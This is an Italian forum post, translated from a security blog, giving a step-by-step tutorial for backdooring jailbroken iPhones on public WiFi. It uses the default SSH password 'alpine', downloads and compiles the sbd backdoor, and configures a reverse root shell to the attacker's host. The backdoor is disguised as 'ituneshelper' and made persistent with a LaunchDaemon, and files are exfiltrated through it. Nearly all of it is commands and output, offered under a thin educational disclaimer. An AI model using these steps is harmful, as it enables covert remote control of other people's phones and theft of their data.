Come Fregare un iOS - iPhone, iPod Touch e iPad, metti una Backdoor in un iOS

« Older   Newer »
 
  Share  
.
  1. $an†ø
    view post Posted on 28/7/2012, 20:03
        +1 Like   Dislike
     
    .

    User deleted
    Come Fregare un iOS - iPhone, iPod Touch e iPad, metti una Backdoor in un iOS
    Disclaimer: Ne io ne lo staff ci prendiamo la responsabilità dell'uso improprio che ne fate, in quanto e stato postato solo per scopi didattici informativi.

    Questo e un articolo originale di coresec tradotto e commentato da Andrea Draghetti.



    Si tratta di mettere una Backdoor su un dispositivo iOS . Per chi non sapesse cosa è, leggete il 3D sui virus in questa sezione.

    Molti utenti effettuando la procedura di Jailbreak per avere facilmente accesso ai propri file o alle applicazioni (per poi essere illegalmente copiate), questa procedura prevede l’installazione del pacchetto OpenSSH che permette di accedere remotamente al dispositivo tramite una semplice sessione SSH. Purtroppo gli utenti incuranti della sicurezza non procedono a cambiare la password di default (alpine) e quindi basta ritrovarsi collegati ad una rete wireless pubblica per essere una probabile vittima di un attaccante.

    In questo articolo supponiamo che Mario abbia effettuato il Jailbreak del suo iPhone, installato OpenSSH senza cambiare la password di default e si trova all’Università dove è disponibile una rete WiFi pubblica senza alcuna protezione di tipo “Client Isolation”.

    L’attaccante procederà ad una scansione di rete all’interno della rete WiFi dell’università, individuerà l’iPhone di Mario con il quale aprirà semplicemente una sessione SSH. Successivamente procederà all’installazione della Backdoor sbd-1.36 sviluppata da Michel Blomgren.


    Una volta aperta la sessione SSH procediamo all’installazione ed esecuzione delle pacchetto iphone-gcc

    iphone4:~ root# uname -an
    Darwin iphone4 11.0.0 Darwin Kernel Version 11.0.0: Tue Nov 1 20:33:58 PDT 2011; root:xnu-1878.4.46~1/RELEASE_ARM_S5L8930X iPhone3,1 arm N90AP Darwin

    iphone4:~ root# apt-get update
    Get:1 http://repo.biteyourapple.net ./ Release.gpg [490B]
    Hit http://cydia.zodttd.com stable Release.gpg
    Hit http://apt.saurik.com ios/675.00 Release.gpg
    Hit http://repo.insanelyi.com ./ Release.gpg
    ...

    iphone4:~ root# apt-get install iphone-gcc
    Reading package lists... Done
    Building dependency tree
    Reading state information... Done
    ...
    Setting up ldid (610-5) ...
    Setting up com.sull.iphone-gccheaders (1.0-11) ...
    Setting up com.sull.fake-libgcc (1.0-2) ...
    Setting up iphone-gcc (4.2-20080604-1-8) ...

    iphone4:~/sbd-1.36 root# apt-get install make
    Reading package lists... Done
    Building dependency tree
    Reading state information... Done
    ...
    Unpacking make (from .../make_3.81-2_iphoneos-arm.deb) ...
    Setting up make (3.81-2) ...
    Scarichiamo ed estraiamo la Backdoor

    iphone4:~ root# wget http://packetstorm.tacticalflex.com/UNIX/n...sbd-1.36.tar.gz
    --2012-04-23 23:50:43-- http://packetstorm.tacticalflex.com/UNIX/n...sbd-1.36.tar.gz
    Resolving packetstorm.tacticalflex.com... 173.160.180.156
    Connecting to packetstorm.tacticalflex.com|173.160.180.156|:80... connected.
    HTTP request sent, awaiting response... 200 OK
    Length: 84093 (82K) [application/x-gzip]
    Saving to: `sbd-1.36.tar.gz'

    100%[======================================>] 84,093 66.3K/s in 1.2s

    2012-04-23 23:50:45 (66.3 KB/s) - `sbd-1.36.tar.gz' saved [84093/84093]

    iphone4:~ root# tar -zxvf sbd-1.36.tar.gz
    sbd-1.36/
    sbd-1.36/sbd.c
    sbd-1.36/doexec.c
    sbd-1.36/pel.c
    sbd-1.36/aes.c
    sbd-1.36/sha1.c
    sbd-1.36/socket_code.h
    sbd-1.36/pel.h
    sbd-1.36/aes.h
    sbd-1.36/sha1.h
    sbd-1.36/sbd.h
    sbd-1.36/doexec_unix.h
    sbd-1.36/doexec_win32.h
    sbd-1.36/readwrite.h
    sbd-1.36/misc.h
    sbd-1.36/Makefile
    sbd-1.36/mktarball.sh
    sbd-1.36/README
    sbd-1.36/COPYING
    sbd-1.36/CHANGES
    sbd-1.36/binaries/
    sbd-1.36/binaries/sbd.exe
    sbd-1.36/binaries/sbdbg.exe

    iphone4:~ root# cd sbd-1.36
    iphone4:~/sbd-1.36 root# ls -al
    total 224
    drwx------ 3 1000 100 748 Sep 17 2004 ./
    drwxr-x--- 6 root wheel 272 Apr 23 23:50 ../
    -rw------- 1 1000 100 1876 Sep 17 2004 CHANGES
    -rw------- 1 1000 100 18007 Jun 8 2004 COPYING
    -rw------- 1 1000 100 2176 Jun 20 2004 Makefile
    -rw------- 1 1000 100 4880 Sep 11 2004 README
    -rw------- 1 1000 100 31370 Jun 12 2004 aes.c
    -rw------- 1 1000 100 549 Jun 11 2004 aes.h
    drwx------ 2 1000 100 136 Sep 11 2004 binaries/
    -rw------- 1 1000 100 77 Jun 2 2004 doexec.c
    -rw------- 1 1000 100 7114 Sep 11 2004 doexec_unix.h
    -rw------- 1 1000 100 19060 Sep 8 2004 doexec_win32.h
    -rw------- 1 1000 100 14968 Sep 9 2004 misc.h
    -rwx------ 1 1000 100 624 Jun 13 2004 mktarball.sh*
    -rw------- 1 1000 100 13381 Sep 8 2004 pel.c
    -rw------- 1 1000 100 898 Sep 9 2004 pel.h
    -rw------- 1 1000 100 9829 Sep 9 2004 readwrite.h
    -rw------- 1 1000 100 20557 Sep 9 2004 sbd.c
    -rw------- 1 1000 100 2014 Jun 8 2004 sbd.h
    -rw------- 1 1000 100 8900 Jun 2 2004 sha1.c
    -rw------- 1 1000 100 436 Jun 2 2004 sha1.h
    -rw------- 1 1000 100 20800 Sep 9 2004 socket_code.h
    Procediamo alla configurazione della Backdoor (esecuzione come demone, indirizzo ip, porta, password, impostazioni di crittografia, ecc ecc).

    iphone4:~/sbd-1.36 root# cat sbd.h
    #define SOURCE_PORT 0
    #define CONVERT_TO_CRLF 0
    #define ENCRYPTION 1
    #define SHARED_SECRET "password"
    #define QUIET 0
    #define VERBOSE 0
    #define DAEMONIZE 0
    #define HIGHLIGHT_INCOMING 0
    #define HIGHLIGHT_PREFIX "\x1b[0;32m"
    #define HIGHLIGHT_SUFFIX "\x1b[0m"
    #define SEPARATOR_BETWEEN_PREFIX_AND_DATA ": "
    #define RUN_ONLY_ONE_INSTANCE 0
    #define INSTANCE_SEMAPHORE "shadowinteger_bd_semaphore"

    /* connect to 192.168.200.22 on port 443 (https) and serve /bin/bash.
    * reconnect every 10 seconds.
    */

    #define DOLISTEN 0
    #define HOST "192.168.200.22"
    #define PORT 443
    #define RESPAWN_ENABLED 1
    #define RESPAWN_INTERVAL 10
    #define EXECPROG "/bin/bash"
    Compiliamo SBD

    <pre>iphone4:~/sbd-1.36 root# make
    usage:
    make unix - Linux, NetBSD, FreeBSD, OpenBSD
    make sunos - SunOS (Solaris)
    make win32 - native win32 console app (w/ Cygwin + MinGW)
    make win32bg - create a native win32 no-console app (w/ Cygwin + MinGW)
    make win32bg CFLAGS=-DSTEALTH - stealthy no-console app
    make mingw - native win32 console app (w/ MinGW MSYS)
    make mingwbg - native win32 no-console app (w/ MinGW MSYS)
    make cygwin - Cygwin console app
    make darwin - Darwin

    iphone4:~/sbd-1.36 root# make darwin
    rm -f sbd sbd.exe *.o core
    gcc -Wall -Wshadow -O2 -o sbd pel.c aes.c sha1.c doexec.c sbd.c
    strip sbd

    iphone4:~/sbd-1.36 root# ls -al sbd
    -rwxr-xr-x 1 root 100 55296 Apr 24 02:10 sbd*
    Impostiamo l’avvio automatico della Backdoor attraverso LaunchDaemons

    iphone4:~/sbd-1.36 root# cp sbd /usr/bin/ituneshelper
    iphone4:~/sbd-1.36 root# cd /Library/LaunchDaemons/
    iphone4:/Library/LaunchDaemons root# ls -al
    total 16
    drwxr-xr-x 2 root wheel 136 Apr 24 02:02 ./
    drwxrwxr-x 18 root admin 816 Dec 31 15:38 ../
    -rw-r--r-- 1 root wheel 847 Feb 15 2011 com.openssh.sshd.plist

    iphone4:/Library/LaunchDaemons root# cat << EOF >> com.ituneshelper.start.plist
    <?xml version="1.0" encoding="UTF-8"?>
    <!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">


    Label
    com.ituneshelper.start
    ProgramArguments

    /usr/bin/ituneshelper

    RunAtLoad
    <true/>
    StartInterval
    1


    EOF

    iphone4:/Library/LaunchDaemons root# ls -al
    total 16
    drwxr-xr-x 2 root wheel 136 Apr 24 02:15 ./
    drwxrwxr-x 18 root admin 816 Dec 31 15:38 ../
    -rw-r--r-- 1 root wheel 404 Apr 24 02:01 com.ituneshelper.start.plist
    -rw-r--r-- 1 root wheel 847 Feb 15 2011 com.openssh.sshd.plist
    L’installazione della Backdoor è conclusa, procediamo quindi a testare la connessione dal nostro PC

    root@coresec:~# uname -an
    Linux coresec 3.0.0-17-generic #30-Ubuntu SMP Thu Mar 8 20:45:39 UTC 2012 x86_64 x86_64 x86_64 GNU/Linux

    root@coresec:~# ifconfig
    eth0 Link encap:Ethernet HWaddr 00:0c:29:03:72:5e
    inet addr:192.168.200.22 Bcast:192.168.200.255 Mask:255.255.255.0
    inet6 addr: fe80::20c:29ff:fe03:725e/64 Scope:Link
    UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
    RX packets:14741 errors:0 dropped:0 overruns:0 frame:0
    TX packets:10042 errors:0 dropped:0 overruns:0 carrier:0
    collisions:0 txqueuelen:1000
    RX bytes:20159805 (20.1 MB) TX bytes:720669 (720.6 KB)

    root@coresec:/home/enzo/sbd-1.36# ./sbd -l -p 443 -k password
    id
    uid=0(root) gid=0(wheel) groups=0(wheel)
    /bin/bash -i
    bash: no job control in this shell
    bash-4.0# ps -ef
    UID PID PPID C STIME TTY TIME CMD
    0 1 0 0 0:00.00 ?? 0:00.95 /sbin/launchd
    0 19 1 0 0:00.00 ?? 0:00.95 /usr/libexec/UserEventAgent -l System
    0 21 1 0 0:00.00 ?? 0:00.68 /usr/sbin/notifyd
    0 23 1 0 0:00.00 ?? 0:00.41 /usr/sbin/syslogd
    0 25 1 0 0:00.00 ?? 0:01.64 /usr/libexec/configd
    25 27 1 0 0:00.00 ?? 0:01.53 /System/Library/Frameworks/CoreTelephony.framework/Support/CommCenterClassic
    501 29 1 0 0:00.00 ?? 0:12.27 /System/Library/CoreServices/SpringBoard.app/SpringBoard
    501 33 1 0 0:00.00 ?? 0:00.60 /System/Library/PrivateFrameworks/ManagedConfiguration.framework/Support/profiled
    0 37 1 0 0:00.00 ?? 0:00.81 /usr/libexec/lockdownd
    0 43 1 0 0:00.00 ?? 0:00.56 /System/Library/CoreServices/powerd.bundle/powerd
    0 49 1 0 0:00.00 ?? 0:19.04 /usr/libexec/locationd
    0 55 1 0 0:00.00 ?? 0:00.21 /usr/bin/sbsettingsd
    0 56 1 0 0:00.00 ?? 0:00.69 /usr/sbin/wifid
    501 58 1 0 0:00.00 ?? 0:00.46 /System/Library/PrivateFrameworks/Ubiquity.framework/Versions/A/Support/ubd
    501 71 1 0 0:00.00 ?? 0:01.99 /usr/sbin/mediaserverd
    501 72 1 0 0:00.00 ?? 0:00.13 /System/Library/PrivateFrameworks/MediaRemote.framework/Support/mediaremoted
    65 73 1 0 0:00.00 ?? 0:00.27 /usr/sbin/mDNSResponder -launchd
    501 75 1 0 0:00.00 ?? 0:00.87 /System/Library/PrivateFrameworks/IMCore.framework/imagent.app/imagent
    501 76 1 0 0:00.00 ?? 0:00.45 /System/Library/PrivateFrameworks/IAP.framework/Support/iapd
    0 78 1 0 0:00.00 ?? 0:00.13 /usr/libexec/fseventsd
    501 79 1 0 0:00.00 ?? 0:00.92 /usr/sbin/fairplayd.N90
    501 80 1 0 0:00.00 ?? 0:01.76 /System/Library/PrivateFrameworks/DataAccess.framework/Support/dataaccessd
    501 86 1 0 0:00.00 ?? 0:00.45 /System/Library/PrivateFrameworks/ApplePushService.framework/apsd
    501 87 1 0 0:00.00 ?? 0:00.34 /System/Library/PrivateFrameworks/AggregateDictionary.framework/Support/aggregated
    501 92 1 0 0:00.00 ?? 0:00.39 /usr/sbin/BTServer
    501 93 1 0 0:00.00 ?? 0:00.99 /usr/sbin/aosnotifyd
    0 94 1 0 0:00.00 ?? 0:00.02 /usr/bin/ituneshelper
    0 157 1 0 0:00.00 ?? 0:00.11 /usr/libexec/networkd
    501 260 1 0 0:00.00 ?? 0:01.94 /Applications/MobileMail.app/MobileMail
    501 261 1 0 0:00.00 ?? 0:00.75 /Applications/MobilePhone.app/MobilePhone
    0 286 94 0 0:00.00 ?? 0:00.03 bash
    0 300 286 0 0:00.00 ?? 0:00.03 /bin/bash -i
    0 303 300 0 0:00.00 ?? 0:00.01 ps -ef

    bash-4.0# uname -an
    Darwin iphone4 11.0.0 Darwin Kernel Version 11.0.0: Tue Nov 1 20:33:58 PDT 2011; root:xnu-1878.4.46~1/RELEASE_ARM_S5L8930X iPhone3,1 arm N90AP Darwin
    Se per esempio vogliamo trasferire un file dal dispositivo

    root@coresec:/home/enzo/sbd-1.36# sbd -l -p 12345 -k secret > output.file

    iphone4:~/sbd-1.36 root# cat /.../.../input.file | ./sbd -k secret 192.168.200.22 12345
    Infine vi riportiamo la procedura per disinstallare la Backdoor

    iphone4:/Library/LaunchDaemons root# rm -rf com.ituneshelper.start.plist
    iphone4:/Library/LaunchDaemons root# rm -rf /usr/bin/ituneshelper

    Si ringrazia Andrea Droghetti.

     
    .
0 replies since 28/7/2012, 20:03   211 views
  Share  
.

Hacking Zone
Create your forum and your blog! · Top Forum · Categories · Help · Status · Contacts · Powered by ForumCommunity